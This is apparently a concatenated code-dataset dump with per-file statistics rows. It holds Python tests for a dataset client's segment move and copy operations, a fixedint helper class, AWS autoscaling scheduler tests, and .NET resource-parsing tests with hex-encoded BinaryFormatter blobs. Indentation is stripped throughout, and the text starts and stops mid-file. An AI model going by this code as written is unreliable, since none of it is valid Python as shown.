segment1.append(data)
segment2 = dataset.create_segment("Segment2")
for i in range(10, 20):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT_2")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment2.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.move_segment("Segment1", "Segment2", strategy="override")
with pytest.raises(ResourceNotExistError):
dataset_client.get_segment("Segment1")
segment_moved = Segment("Segment2", client=dataset_client)
assert segment_moved[0].path == "hello0.txt"
assert segment_moved[0].path == segment1[0].target_remote_path
assert segment_moved[0].open().read() == b"CONTENT_1"
assert segment_moved[0].label
gas_client.delete_dataset(dataset_name)
def test_move_segment_skip(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment1 = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT_1")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment1.append(data)
segment2 = dataset.create_segment("Segment2")
for i in range(10, 20):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT_2")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment2.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.move_segment("Segment1", "Segment2", strategy="skip")
segment_moved = Segment("Segment2", client=dataset_client)
assert segment_moved[0].path == "hello10.txt"
assert segment_moved[0].path == segment2[0].target_remote_path
assert segment_moved[0].open().read() == b"CONTENT_2"
assert segment_moved[0].label
gas_client.delete_dataset(dataset_name)
def test_move_data(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.get_segment("Segment1")
segment_client.move_data("hello0.txt", "goodbye0.txt")
segment_client.move_data("hello9.txt", "goodbye1.txt")
# with pytest.raises(InvalidParamsError):
# segment_client.move_data("hello1.txt", "goodbye2.txt", strategy="push")
segment2 = Segment("Segment1", client=dataset_client)
assert segment2[0].path == "goodbye0.txt"
assert segment2[1].path == "goodbye1.txt"
assert segment2[9].path == "hello8.txt"
assert segment2[0].label
gas_client.delete_dataset(dataset_name)
def test_move_data_override(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text(f"CONTENT_{i}")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.get_segment("Segment1")
segment_client.move_data("hello0.txt", "hello1.txt", strategy="override")
segment_moved = Segment("Segment1", client=dataset_client)
for data in segment_moved:
assert data.path != "hello0.txt"
assert data.label
if data.path == "hello1.txt":
assert data.open().read() == b"CONTENT_0"
gas_client.delete_dataset(dataset_name)
def test_move_data_skip(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text(f"CONTENT_{i}")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.get_segment("Segment1")
segment_client.move_data("hello0.txt", "hello1.txt", strategy="skip")
segment_moved = Segment("Segment1", client=dataset_client)
assert segment_moved[0].path == "hello1.txt"
assert segment_moved[0].open().read() == b"CONTENT_1"
gas_client.delete_dataset(dataset_name)
class TestCopy:
def test_copy_segment(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.copy_segment("Segment1", "Segment2")
assert segment_client.name == "Segment2"
with pytest.raises(InvalidParamsError):
dataset_client.copy_segment("Segment1", "Segment3", strategy="push")
segment2 = Segment("Segment2", client=dataset_client)
assert segment2[0].path == "hello0.txt"
assert segment2[0].path == segment[0].target_remote_path
assert segment2[0].label
gas_client.delete_dataset(dataset_name)
def test_copy_fusion_segment(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name, is_fusion=True)
dataset = FusionDataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
segment.sensors.add(Sensor.loads(LIDAR_DATA))
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
frame = Frame()
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
frame[LIDAR_DATA["name"]] = data
segment.append(frame)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.copy_segment("Segment1", "Segment2")
assert segment_client.name == "Segment2"
with pytest.raises(InvalidParamsError):
dataset_client.copy_segment("Segment1", "Segment3", strategy="push")
segment2 = FusionSegment("Segment2", client=dataset_client)
assert segment2[0][LIDAR_DATA["name"]].path == "hello0.txt"
assert (
segment2[0][LIDAR_DATA["name"]].path
== segment[0][LIDAR_DATA["name"]].target_remote_path
)
assert segment2[0][LIDAR_DATA["name"]].label
gas_client.delete_dataset(dataset_name)
def test_copy_fusion_segment_from_commits(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name, is_fusion=True)
dataset = FusionDataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
segment.sensors.add(Sensor.loads(LIDAR_DATA))
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
frame = Frame()
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
frame[LIDAR_DATA["name"]] = data
segment.append(frame)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.commit("commit_1")
dataset_client.create_draft("draft_2")
dataset_client.commit("commit_2")
dataset_client.create_draft("draft_3")
dataset_client_1 = gas_client.get_dataset(dataset_name, is_fusion=True)
segment_client = dataset_client.copy_segment(
"Segment1", "Segment2", source_client=dataset_client_1
)
assert segment_client.name == "Segment2"
with pytest.raises(InvalidParamsError):
dataset_client.copy_segment("Segment1", "Segment3", strategy="push")
segment2 = FusionSegment("Segment2", client=dataset_client)
assert segment2[0][LIDAR_DATA["name"]].path == "hello0.txt"
assert (
segment2[0][LIDAR_DATA["name"]].path
== segment[0][LIDAR_DATA["name"]].target_remote_path
)
assert segment2[0][LIDAR_DATA["name"]].label
gas_client.delete_dataset(dataset_name)
def test_copy_segment_abort(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment1 = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment1.append(data)
segment2 = dataset.create_segment("Segment2")
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment2.append(data)
dataset_client = gas_client.upload_dataset(dataset)
with pytest.raises(InternalServerError):
dataset_client.copy_segment("Segment1", "Segment2")
gas_client.delete_dataset(dataset_name)
def test_copy_segment_override(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment1 = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment1.append(data)
segment2 = dataset.create_segment("Segment2")
for i in range(10, 20):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment2.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.copy_segment("Segment1", "Segment2", strategy="override")
segment_copied = Segment("Segment2", client=dataset_client)
assert segment_copied[0].path == "hello0.txt"
assert segment_copied[0].path == segment1[0].target_remote_path
assert segment_copied[0].label
gas_client.delete_dataset(dataset_name)
def test_copy_segment_skip(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment1 = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment1.append(data)
segment2 = dataset.create_segment("Segment2")
for i in range(10, 20):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment2.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.copy_segment("Segment1", "Segment2", strategy="skip")
segment_copied = Segment("Segment2", client=dataset_client)
assert segment_copied[0].path == "hello10.txt"
assert segment_copied[0].path == segment2[0].target_remote_path
assert segment_copied[0].label
gas_client.delete_dataset(dataset_name)
def test_copy_segment_between_datasets(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name_1 = get_dataset_name()
gas_client.create_dataset(dataset_name_1)
dataset_1 = Dataset(name=dataset_name_1)
segment_1 = dataset_1.create_segment("Segment1")
dataset_1._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment_1.append(data)
dataset_client_1 = gas_client.upload_dataset(dataset_1)
dataset_name_2 = dataset_name_1 + "_2"
dataset_client_2 = gas_client.create_dataset(dataset_name_2)
dataset_client_2.create_draft("draft_2")
segment_client = dataset_client_2.copy_segment(
"Segment1", "Segment2", source_client=dataset_client_1
)
assert segment_client.name == "Segment2"
segment2 = Segment("Segment2", client=dataset_client_2)
assert segment2[0].path == "hello0.txt"
assert segment2[0].path == segment_1[0].target_remote_path
assert segment2[0].label
gas_client.delete_dataset(dataset_name_1)
gas_client.delete_dataset(dataset_name_2)
def test_copy_segment_from_commits(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.commit("commit_1")
for i in range(10, 20):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.commit("commit_2")
dataset_client_1 = gas_client.get_dataset(dataset_name)
commit_id = dataset_client_1.list_commits()[-1].commit_id
dataset_client_1.checkout(revision=commit_id)
dataset_client.create_draft("draft_3")
segment_client = dataset_client.copy_segment(
"Segment1", "Segment2", source_client=dataset_client_1
)
assert segment_client.name == "Segment2"
segment2 = Segment("Segment2", client=dataset_client)
assert segment2[0].path == "hello0.txt"
assert segment2[0].path == segment[0].target_remote_path
assert segment2[0].label
assert len(segment2) == 10
gas_client.delete_dataset(dataset_name)
def test_copy_data(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
segment_client = dataset_client.get_segment("Segment1")
segment_client.copy_data("hello0.txt", "goodbye0.txt")
segment_client.copy_data("hello1.txt", "hello10.txt")
with pytest.raises(InvalidParamsError):
segment_client.copy_data("hello2.txt", "see_you.txt", strategy="push")
segment2 = Segment("Segment1", client=dataset_client)
assert segment2[0].path == "goodbye0.txt"
assert segment2[3].path == "hello10.txt"
assert segment2[1].label
gas_client.delete_dataset(dataset_name)
def test_copy_data_between_datasets(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name_1 = get_dataset_name()
gas_client.create_dataset(dataset_name_1)
dataset_1 = Dataset(name=dataset_name_1)
segment_1 = dataset_1.create_segment("Segment1")
dataset_1._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment_1.append(data)
dataset_client_1 = gas_client.upload_dataset(dataset_1)
dataset_client_1.commit("upload data")
segment_client_1 = dataset_client_1.get_segment("Segment1")
dataset_name_2 = dataset_name_1 + "_2"
dataset_client_2 = gas_client.create_dataset(dataset_name_2)
dataset_client_2.create_draft("draft_2")
dataset_client_2.create_segment("Segment1")
segment_client_2 = dataset_client_2.get_segment("Segment1")
segment_client_2.copy_data("hello0.txt", "hello0.txt", source_client=segment_client_1)
segment2 = Segment("Segment1", client=dataset_client_2)
assert segment2[0].path == "hello0.txt"
assert segment2[0].label
gas_client.delete_dataset(dataset_name_1)
gas_client.delete_dataset(dataset_name_2)
def test_copy_data_from_commits(self, accesskey, url, tmp_path):
gas_client = GAS(access_key=accesskey, url=url)
dataset_name = get_dataset_name()
gas_client.create_dataset(dataset_name)
dataset = Dataset(name=dataset_name)
segment = dataset.create_segment("Segment1")
dataset._catalog = Catalog.loads(CATALOG)
path = tmp_path / "sub"
path.mkdir()
for i in range(10):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.commit("commit_1")
for i in range(10, 20):
local_path = path / f"hello{i}.txt"
local_path.write_text("CONTENT")
data = Data(local_path=str(local_path))
data.label = Label.loads(LABEL)
segment.append(data)
dataset_client = gas_client.upload_dataset(dataset)
dataset_client.commit("commit_2")
dataset_client_1 = gas_client.get_dataset(dataset_name)
commit_id = dataset_client_1.list_commits()[-1].commit_id
dataset_client_1.checkout(revision=commit_id)
dataset_client.create_draft("draft_3")
segment_client_1 = dataset_client_1.get_segment("Segment1")
segment_client_2 = dataset_client.get_segment("Segment1")
segment_client_2.copy_data("hello0.txt", "goodbye0.txt", source_client=segment_client_1)
segment2 = Segment("Segment1", client=dataset_client)
assert segment2[0].path == "goodbye0.txt"
assert segment2[0].path != segment[0].target_remote_path
assert segment2[0].label
assert len(segment2) == 21
gas_client.delete_dataset(dataset_name)
| 39.771117
| 99
| 0.629556
| 3,504
| 29,192
| 4.984589
| 0.050799
| 0.077465
| 0.060804
| 0.040078
| 0.93599
| 0.932497
| 0.91744
| 0.891045
| 0.888641
| 0.876503
| 0
| 0.026854
| 0.255036
| 29,192
| 733
| 100
| 39.825375
| 0.776291
| 0.006474
| 0
| 0.78871
| 0
| 0
| 0.084698
| 0
| 0
| 0
| 0
| 0
| 0.098387
| 1
| 0.030645
| false
| 0
| 0.01129
| 0
| 0.045161
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b15046ebae643ff4ac7f0382df318185641f83ed
| 688
|
py
|
Python
|
tests/fixedint.py
|
long96350/contractsV2
|
8e1c575961106b571cdb0761303900ca6d1844d0
|
[
"Apache-2.0"
] | 1
|
2020-07-03T07:33:00.000Z
|
2020-07-03T07:33:00.000Z
|
tests/fixedint.py
|
long96350/contractsV2
|
8e1c575961106b571cdb0761303900ca6d1844d0
|
[
"Apache-2.0"
] | null | null | null |
tests/fixedint.py
|
long96350/contractsV2
|
8e1c575961106b571cdb0761303900ca6d1844d0
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python3
class fixedint(object):
def __init__(self, num):
self.num = int(num)
def __repr__(self):
return str(self.num)
def __str__(self):
return str(self.num)
def __int__(self):
return int(self.num)
def __float__(self):
return int(self.num)
def add(self, num):
self.num = int(int(self.num) + int(num))
return self
def sub(self, num):
self.num = int(int(self.num) - int(num))
return self
def mul(self, num):
self.num = int(int(self.num) * int(num))
return self
def div(self, num):
self.num = int(int(self.num) // int(num))
return self
| 26.461538
| 49
| 0.555233
| 98
| 688
| 3.693878
| 0.193878
| 0.348066
| 0.248619
| 0.19337
| 0.801105
| 0.754144
| 0.5
| 0.5
| 0.5
| 0.5
| 0
| 0.002088
| 0.303779
| 688
| 26
| 50
| 26.461538
| 0.753653
| 0.024709
| 0
| 0.347826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.391304
| false
| 0
| 0
| 0.173913
| 0.782609
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
b15f8f6aa4341b1bba483e5d1e9c69528d9b22cf
| 3,589
|
py
|
Python
|
tests/integration/test_asg_scheduler.py
|
mixe3y/terraform-aws-lambda-scheduler-stop-start
|
16b39f8dbf340d7f5d697edb81ae32eadb211304
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_asg_scheduler.py
|
mixe3y/terraform-aws-lambda-scheduler-stop-start
|
16b39f8dbf340d7f5d697edb81ae32eadb211304
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_asg_scheduler.py
|
mixe3y/terraform-aws-lambda-scheduler-stop-start
|
16b39f8dbf340d7f5d697edb81ae32eadb211304
|
[
"Apache-2.0"
] | null | null | null |
"""Tests for the autoscaling group scheduler."""
import boto3
import time
from random import randint
from package.scheduler.autoscaling_handler import AutoscalingScheduler
from package.scheduler.cloudwatch_handler import CloudWatchAlarmScheduler
from .fixture import launch_asg
import pytest
@pytest.mark.parametrize(
"aws_region, asg_tag, scheduler_tag, result_count",
[
(
"eu-west-1",
[{"Key": "tostop-asg-test-1", "Values": ["true"]}],
[{"Key": "tostop-asg-test-1", "Values": ["true"]}],
10,
),
(
"eu-west-1",
[{"Key": "badtagkey", "Values": ["badtagvalue"]}],
[{"Key": "tostop-asg-test-2", "Values": ["true"]}],
0,
),
],
)
def test_stop_asg_scheduler(aws_region, asg_tag, scheduler_tag, result_count):
"""Verify stop asg scheduler class method."""
client = boto3.client("autoscaling", region_name=aws_region)
launch_conf_name = "lc-test" + str(randint(0, 1000000000))
asg_name = "asg-test" + str(randint(0, 1000000000))
tag_key = asg_tag[0]["Key"]
tag_value = "".join(asg_tag[0]["Values"])
launch_asg(aws_region, tag_key, tag_value, launch_conf_name, asg_name)
try:
asg_scheduler = AutoscalingScheduler(aws_region)
asg_scheduler.cloudwatch_alarm = CloudWatchAlarmScheduler(aws_region)
asg_scheduler.stop(scheduler_tag)
suspend_process = client.describe_auto_scaling_groups(
AutoScalingGroupNames=[asg_name]
)["AutoScalingGroups"][0]["SuspendedProcesses"]
assert len([x["ProcessName"] for x in suspend_process]) == result_count
finally:
# Clean aws account
client.delete_auto_scaling_group(
AutoScalingGroupName=asg_name, ForceDelete=True
)
client.delete_launch_configuration(LaunchConfigurationName=launch_conf_name)
@pytest.mark.parametrize(
"aws_region, asg_tag, scheduler_tag, result_count",
[
(
"eu-west-1",
[{"Key": "tostop-asg-test-3", "Values": ["true"]}],
[{"Key": "tostop-asg-test-3", "Values": ["true"]}],
0,
),
(
"eu-west-1",
[{"Key": "badtagkey", "Values": ["badtagvalue"]}],
[{"Key": "tostop-asg-test-4", "Values": ["true"]}],
10,
),
],
)
def test_start_asg_scheduler(aws_region, asg_tag, scheduler_tag, result_count):
"""Verify start asg scheduler class method."""
client = boto3.client("autoscaling", region_name=aws_region)
launch_conf_name = "lc-test" + str(randint(0, 1000000000))
asg_name = "asg-test" + str(randint(0, 1000000000))
tag_key = asg_tag[0]["Key"]
tag_value = "".join(asg_tag[0]["Values"])
launch_asg(aws_region, tag_key, tag_value, launch_conf_name, asg_name)
try:
client.suspend_processes(AutoScalingGroupName=asg_name)
asg_scheduler = AutoscalingScheduler(aws_region)
asg_scheduler.cloudwatch_alarm = CloudWatchAlarmScheduler(aws_region)
asg_scheduler.start(scheduler_tag)
suspend_process = client.describe_auto_scaling_groups(
AutoScalingGroupNames=[asg_name]
)["AutoScalingGroups"][0]["SuspendedProcesses"]
assert len([x["ProcessName"] for x in suspend_process]) == result_count
finally:
# Clean aws account
client.delete_auto_scaling_group(
AutoScalingGroupName=asg_name, ForceDelete=True
)
client.delete_launch_configuration(LaunchConfigurationName=launch_conf_name)
| 35.89
| 84
| 0.641962
| 397
| 3,589
| 5.544081
| 0.206549
| 0.049069
| 0.043617
| 0.043617
| 0.833258
| 0.833258
| 0.833258
| 0.798728
| 0.798728
| 0.798728
| 0
| 0.024838
| 0.225968
| 3,589
| 99
| 85
| 36.252525
| 0.767459
| 0.044581
| 0
| 0.707317
| 0
| 0
| 0.15592
| 0
| 0
| 0
| 0
| 0
| 0.02439
| 1
| 0.02439
| false
| 0
| 0.085366
| 0
| 0.109756
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b17c24f40d0750899d95c0e3c3aed81f537b413b
| 42,455
|
py
|
Python
|
test/lib/test_dotnet.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | 1
|
2022-02-13T20:57:15.000Z
|
2022-02-13T20:57:15.000Z
|
test/lib/test_dotnet.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
test/lib/test_dotnet.py
|
bronxc/refinery
|
9448facf48a0008f27861dd1a5ee8f5218e6bb86
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from refinery.lib.dotnet.deserialize import BinaryFormatterParser, unpack
from refinery.lib.dotnet.resources import NetManifestResource, StreamReader
from refinery.lib.dotnet.types import StringGUID
from .. import TestBase
class TestDotNetParser(TestBase):
def test_parse_binary_formatted_resource(self):
resource = bytes.fromhex(
'0001000000FFFFFFFF01000000000000000C020000005153797374656D2E44726177696E672C' # ......................QSystem.Drawing,
'2056657273696F6E3D322E302E302E302C2043756C747572653D6E65757472616C2C20507562' # .Version=2.0.0.0,.Culture=neutral,.Pub
'6C69634B6579546F6B656E3D6230336635663766313164353061336105010000001553797374' # licKeyToken=b03f5f7f11d50a3a......Syst
'656D2E44726177696E672E4269746D617001000000044461746107020200000009030000000F' # em.Drawing.Bitmap.....Data............
'03000000980200000289504E470D0A1A0A0000000D4948445200000010000000100806000000' # ..........PNG........IHDR.............
'1FF3FF610000000467414D410000B18F0BFC6105000000206348524D00007A26000080840000' # ...a....gAMA......a.....cHRM..z&......
'FA00000080E8000075300000EA6000003A98000017709CBA513C0000022349444154384FA591' # ........u0...`..:....p..Q<...#IDAT8O..
'DD4B537118C77F17F51F1444DD2C8A52CA5E2108EA2A084190A02E2CA41814BDA9B5EA585944' # .KSq.......D.,.R.^!..*.A...,.......XYD
'5E7461CA192EF2942FB09367B6B3ADADF9D65E0AABCD2D4B6B68A6C492B963C3A9BD9179BB9E' # ^ta...../..g......^...-Kkh....c....y..
'EFDA8F4E69DE74F1E1E17C9FEFE739700EDB72C19765ABE0CFB2AD329065FBC5E00EA20C9367' # ...Ni.t...|...9p..r..e.....2.e.......g
'80F7B8B7D001035144946732997E4CC298CB0C8B1D5842EC29AE099D6C0B8D5B9A1E7F50E8B9' # .......QD.g2.~L......XB.)...l..[...P..
'42F2C7656D66CE8B0C3B74D09D7780283459DF08DAA7B900F13431FD23A8071976E8A0CB3DB6' # B..emf...;t..w.(4Y.......41.#...v...=.
'F9FC239077A02E5C416F0A8CA567FD84EF1FF8D141170E5C5660EA629BCE751FEA7E9DBA1B9F' # ..#.w..\Ao...g......A..\V`.b..u..~....
'9CF5BD4F7DEF5A0C74D08503976D3CDBB98B10CC9DA3B661ED5BBB9E58E28B2B3C3A63F5C526' # ...O}.Z.t....m<........a.[..X..+<:c..&
'6F7BFB3F8AAEBE899BA05A1D6C8403976D38D371095F1B3396F8EA01AFE29F1D24DD7144B53A' # o{.?......Z.l...m8.q._.3........$.qD.:
'B537C9A9E5E81D965FEEDD4D54D5788615121FF4BC9D9249ACB7F726457B84F83DCD39C42B6D' # .7......_..MT.x........I...&E{..=.9.+m
'B1663870595ED943B6FEB4C7E88C8C4B4F86D20A956F51C9727F0190BBFB2624B9674C840397' # .f8pY^.C.......KO....oQ.r.....&$.gL...
'AD3BE5060585D5C1CAD0C894CD114D4A6A34D9F007915F385F68127594BDD703021CB86CED09' # .;............MJj4...._8_h.u.......l..
'17677FA9F9D9D5F0C8B4AD6320253BA35A638E264C64D8A1832EF7D89AE34ECED2D5C7D47D3B' # .g.........c.%;.Zc.&Ld........N.....};
'85F6CBB5EE41CBF37769D9D4F252311CB5DFA86A1D509161870EBADCD31F605466AB8EB4E6AF' # .....A..wi...R1....j.P.a......`Tf.....
'3C7CCF485C23447C6D4C64D8A1A377F01BFF3EC056945AB32C3FD852B4ACA4B90113CFD8CD3B' # <|.H\#D|mLd...w...>.V.Z.,?.R.........;
'406FF80F32EC2745AA42D6480BEBEE0000000049454E44AE4260820B' # @o..2.'E.B.H.......IEND.B`..
)
header, library, container, blob = BinaryFormatterParser(resource)
value = unpack(container.Members.Data)
self.assertIn(value, blob)
self.assertLessEqual(len(blob.replace(value, B'')), 0x100)
def test_unpack_resource_single_entry(self):
manifest = bytes.fromhex(
'CECAEFBE01000000910000006C53797374656D2E5265736F75726365732E5265736F75726365' # ............lSystem.Resources.Resource
'5265616465722C206D73636F726C69622C2056657273696F6E3D322E302E302E302C2043756C' # Reader,.mscorlib,.Version=2.0.0.0,.Cul
'747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623737613563353631' # ture=neutral,.PublicKeyToken=b77a5c561
'393334653038392353797374656D2E5265736F75726365732E52756E74696D655265736F7572' # 934e089#System.Resources.RuntimeResour
'63655365740200000001000000010000006853797374656D2E44726177696E672E4269746D61' # ceSet............hSystem.Drawing.Bitma
'702C2053797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C204375' # p,.System.Drawing,.Version=2.0.0.0,.Cu
'6C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D6230336635663766' # lture=neutral,.PublicKeyToken=b03f5f7f
'3131643530613361504144504144658721C100000000430100001A7000690070006500740074' # 11d50a3aPADPADe.!.....C....p.i.p.e.t.t
'0065002E0049006D0061006700650000000000400001000000FFFFFFFF01000000000000000C' # .e...I.m.a.g.e.....@..................
'020000005153797374656D2E44726177696E672C2056657273696F6E3D322E302E302E302C20' # ....QSystem.Drawing,.Version=2.0.0.0,.
'43756C747572653D6E65757472616C2C205075626C69634B6579546F6B656E3D623033663566' # Culture=neutral,.PublicKeyToken=b03f5f
'3766313164353061336105010000001553797374656D2E44726177696E672E4269746D617001' # 7f11d50a3a......System.Drawing.Bitmap.
